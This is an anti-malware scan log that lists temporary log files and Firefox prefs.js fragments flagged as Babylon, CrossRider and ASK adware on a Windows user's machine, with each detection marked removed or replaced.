<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb5ffa07b2-04d9-4925-b59e-8efe30c7c6c1.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb68b906e9-1b13-4c1a-9306-d4093db8e821.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb694d544d-7c64-4e4e-93e0-58d0643ff76c.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb806f1a63-a56f-4676-bcae-cbb5060d1fcd.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb86c405cf-4ba9-4631-862d-e7970c350c13.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stba7e907a0-994e-47e2-9236-296bec675fcf.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbbce28ce1-de58-4733-a851-4d1cd6713d3a.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbbea9a13b-ca89-4ef7-8266-a5d221c14c87.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbc86a5935-5fe9-4dc2-81cb-f88ff66a61f7.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbc880a342-d917-4149-a8dd-f477f040f175.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbe2a77da7-02db-41b0-88bc-b2db14e7d490.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbe3eada65-da22-47f4-8514-afcbccee3822.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbe507ffcd-7948-4575-9e73-b325a8cfe8ed.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbe8e1b987-0508-402e-8440-e22104465571.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msibea9a13b-ca89-4ef7-8266-a5d221c14c87.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msic86a5935-5fe9-4dc2-81cb-f88ff66a61f7.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msic880a342-d917-4149-a8dd-f477f040f175.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msie2a77da7-02db-41b0-88bc-b2db14e7d490.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msie3eada65-da22-47f4-8514-afcbccee3822.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msie507ffcd-7948-4575-9e73-b325a8cfe8ed.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msie8e1b987-0508-402e-8440-e22104465571.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb0638b358-c8ed-49b4-9f7f-a21f08886813.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb0d62bb70-7850-46f8-86ca-1d9581568377.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);</baddata><gooddata></gooddata><hash>84557928117a989ef6959bff0ef62dd3</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>nces

/* Do not edit this file.
 *
 * If you mak</baddata><gooddata></gooddata><hash>1fbadcc59af10d29a4e7732733d1dd23</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>ferences

/* Do not edit this file.
 *
 * If you make changes to this file</baddata><gooddata></gooddata><hash>e0f94859e5a6c17583089a0018ecc13f</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata> this file.
 *
 * If you make changes to this file while the application is runnin</baddata><gooddata></gooddata><hash>f4e5f7aa77149e9899f22e6c27dd9f61</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>file.
 *
 * If you make changes to this file while the application is running,</baddata><gooddata></gooddata><hash>f2e778296b20ee4874170793986cbb45</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>his file.
 *
 * If you make changes to this file while th</baddata><gooddata></gooddata><hash>6970cbd6ec9f7db98902fd9df90b13ed</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>s

/* Do not edit this file.
 *
 * If you make change</baddata><gooddata></gooddata><hash>6574f8a95536290dbbd00a90b54f639d</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>ces

/* Do not edit this file.
 *
 * If you make changes to t</baddata><gooddata></gooddata><hash>a6333a67008bbe78eba03b5f3ec6df21</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>* Do not edit this file.
 *
 * If you make changes to this</baddata><gooddata></gooddata><hash>a2374a57fd8ef244513ae5b523e1a55b</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>

/* Do not edit this file.
 *
 * If you make changes</baddata><gooddata></gooddata><hash>8d4c8a175f2c0a2c7f0c702aa16332ce</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>ces

/* Do not edit this file.
 *
 * If you make c</baddata><gooddata></gooddata><hash>54855c4595f6b680f09b6c2e3cc8d12f</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>rences

/* Do not edit this file.
 *
 * If you make</baddata><gooddata></gooddata><hash>f0e9029f4e3d1b1b5437dfbb8f758d73</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>ences

/* Do not edit this file.
 *
 * If you make cha</baddata><gooddata></gooddata><hash>4c8de1c0dbb0f34349421d7d2cd84cb4</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>es

/* Do not edit this file.
 *
 * If you make changes to this </baddata><gooddata></gooddata><hash>f1e8abf6f09b1d1939525f3b1be916ea</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>o not edit this file.
 *
 * If you make changes to this f</baddata><gooddata></gooddata><hash>b722b8e9c0cb52e4e2a9237717ed748c</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>user_pref(&quot;extensions.crossrider.bic&quot;, &quot;139c5ccd042fc6d366e9efe2a8a22d88&quot;);</baddata><gooddata></gooddata><hash>04d5eeb31576ad89754d03970bf9be42</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>user_pref(&quot;extensions.crossriderapp5060.5060.InstallationThankYouPage&quot;, true);</baddata><gooddata></gooddata><hash>bd1c4a57bdcefa3c82416436cd37b848</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>this file.
 *
 * If you make changes to this file while the application is</baddata><gooddata></gooddata><hash>7a5f5849ff8cd066586b5248e0244fb1</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>t this file.
 *
 * If you make changes to this file while the application is running,
 * the change</baddata><gooddata></gooddata><hash>6673861baeddf046388b702af311fb05</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>u make changes to this file while the application is running,
 * the changes will be overw</baddata><gooddata></gooddata><hash>d900d8c9b8d30333f5ce4e4cda2ab749</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>*
 * If you make changes to this file while the application is running,
 * the changes </baddata><gooddata></gooddata><hash>1cbd425f98f348eec20107938a7a0ef2</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 *
 * If you make changes to this file while the application is running,
 * the change</baddata><gooddata></gooddata><hash>28b1257c0685bd794083891181837b85</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 *
 * If you make changes to this file while the applicati</baddata><gooddata></gooddata><hash>99402f727d0e072f3b887921e81cb947</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>

/* Do not edit this file.
 *
 * If you make changes to th</baddata><gooddata></gooddata><hash>fbde940d385349ed299ac2d89a6ac13f</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
/* Do not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config</baddata><gooddata></gooddata><hash>05d4257cbbd063d31ca70c8ec34139c7</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>nual change to preferences, you can visit the URL about:config
</baddata><gooddata></gooddata><hash>3a9f58499bf03df9b40f6e2ce024ad53</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>* Do not edit this file.
 *
 * If you make changes to this file whi</baddata><gooddata></gooddata><hash>8c4da2ff850638fe20a38e0c28dc9e62</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>not edit this file.
 *
 * If you make changes to this file while the </baddata><gooddata></gooddata><hash>10c9eab7e7a437ffc8fbc6d4df2519e7</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>t edit this file.
 *
 * If you make changes to this file while the </baddata><gooddata></gooddata><hash>8d4cb0f1563537ffe3e0574307fd2ed2</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be </baddata><gooddata></gooddata><hash>c31611903a51ff37f3d07e1c18ec54ac</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> this file while the application is running,
 * the changes will be overwritten when the a</baddata><gooddata></gooddata><hash>6c6d5150d5b675c12b98b5e537cdbc44</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>*
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the </baddata><gooddata></gooddata><hash>b623bee356352214289b5d3d956f6898</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>o this file while the application is running,
 * the changes will be overwritten when the application exits.
</baddata><gooddata></gooddata><hash>26b3e5bc76154ee82c976832aa5ab54b</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>anges to this file while the application is running,
 * the changes will be overwr</baddata><gooddata></gooddata><hash>2dac564be0abf14542811684fc08f40c</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten </baddata><gooddata></gooddata><hash>86534d54ddae89ada91a3c5ea4609e62</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>to this file while the application is running,
 * the changes will be overwritten when the application ex</baddata><gooddata></gooddata><hash>d504dfc28902241223a0801a33d13cc4</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ke changes to this file while the application is running,
 * the changes will be overwritten when the application exits</baddata><gooddata></gooddata><hash>88513170d2b90135a91afe9c9d6726da</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>this file while the application is running,
 * the changes will be overwritten when the a</baddata><gooddata></gooddata><hash>3a9f8a17583395a1ab180a90e1235ba5</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten w</baddata><gooddata></gooddata><hash>f3e6dec32566a3937b481b7fa75d04fc</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the</baddata><gooddata></gooddata><hash>38a1e2bfaae16ec8caf9702a788cc739</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>file while the application is running,
 * the changes will be overwritten when the applicatio</baddata><gooddata></gooddata><hash>7861425f701b79bdd3f00991818303fd</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> * If you make changes to this file while the application is running,
 * the changes will be overwritten when the applicati</baddata><gooddata></gooddata><hash>f9e06d349af12e08e1e20892ee1621df</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit</baddata><gooddata></gooddata><hash>3c9dfba682095ed8843fabef986c956b</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can vi</baddata><gooddata></gooddata><hash>8d4c0c95fd8e68ce843fe6b424e0ce32</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>his file while the application is running,
 * the changes will be overwritten when the applic</baddata><gooddata></gooddata><hash>02d76839dfacf83e873c7f1bf410af51</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> * If you make changes to this file while the application is running,
 * the changes will be overwritten when the appl</baddata><gooddata></gooddata><hash>e6f3861b7318e6505370d5c54bb95fa1</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> this file while the application is running,
 * the changes will be overwritten when the appl</baddata><gooddata></gooddata><hash>17c289186e1dac8a6360b7e30cf83ec2</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> * If you make changes to this file while the application is running,
 * the changes will be overwritten when the app</baddata><gooddata></gooddata><hash>5188c4dd751644f29b28fc9e8e765ba5</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>o this file while the application is running,
 * the changes will be overwritten when the</baddata><gooddata></gooddata><hash>8d4c1b86068595a15172f1a906fe36ca</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when</baddata><gooddata></gooddata><hash>a138edb4afdc152143801981fb095fa1</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>es to this file while the application is running,
 * the changes will be overwritten w</baddata><gooddata></gooddata><hash>d801a6fb533891a5f0d38812bd472ed2</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwrit</baddata><gooddata></gooddata><hash>6e6bbee3543770c6ebd85941a95b3dc3</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>changes to this file while the application is running,
 * the changes will be overw</baddata><gooddata></gooddata><hash>6673fca59bf0171f41824d4d857f9e62</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ile.
 *
 * If you make changes to this file while the application is running,</baddata><gooddata></gooddata><hash>f7e24c55c3c859dde3e04a5029db3fc1</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>his file.
 *
 * If you make changes to this file while t</baddata><gooddata></gooddata><hash>fedb40617c0ff73f9f24e4b6b054eb15</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>s

/* Do not edit this file.
 *
 * If you make changes to this </baddata><gooddata></gooddata><hash>1bbe792888030f2710b3306a17ed7e82</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>o not edit this file.
 *
 * If you make changes to this file </baddata><gooddata></gooddata><hash>93466041a5e644f205be138758ac6997</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>/* Do not edit this file.
 *
 * If you make changes to</baddata><gooddata></gooddata><hash>1bbe7928ccbf9e98e2e1fb9f897b8c74</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ces

/* Do not edit this file.
 *
 * If you make changes</baddata><gooddata></gooddata><hash>538641603d4eda5c3e854357ff058080</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>

/* Do not edit this file.
 *
 * If you make changes to t</baddata><gooddata></gooddata><hash>2aaf58490883aa8cb70c0d8ded17b848</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
/* Do not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be </baddata><gooddata></gooddata><hash>2aaf5c458506ef471ca7b5e5a2621ee2</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>le while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-upd</baddata><gooddata></gooddata><hash>4396277a3b50a78f774cc7d312f2dd23</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background</baddata><gooddata></gooddata><hash>5c7dc3de99f29a9c8e353c5e32d244bc</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>s file while the application is running,
 * the changes will be overwritten when the a</baddata><gooddata></gooddata><hash>bc1d3f6297f4c76ff5ce99017c88847c</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the applic</baddata><gooddata></gooddata><hash>f1e8d1d06e1d72c4f8cbafeb4abaa25e</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>e while the application is running,
 * the changes will be overwritten when the applicatio</baddata><gooddata></gooddata><hash>70692d74c8c3b48207bc43578084a55b</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>*
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the app</baddata><gooddata></gooddata><hash>24b58e13800bd95d3e85554549bb9967</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>his file while the application is running,
 * the changes will be overwritten when the a</baddata><gooddata></gooddata><hash>a732f2af98f3a393279c68320bf952ae</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the applic</baddata><gooddata></gooddata><hash>9d3c1190e7a44fe7cff48416d430c739</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ile while the application is running,
 * the changes will be overwritten when the applicati</baddata><gooddata></gooddata><hash>6a6f722fdeade25441826436788c936d</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the appli</baddata><gooddata></gooddata><hash>c811455cd4b7bb7b8d367624788cda26</hash></file>
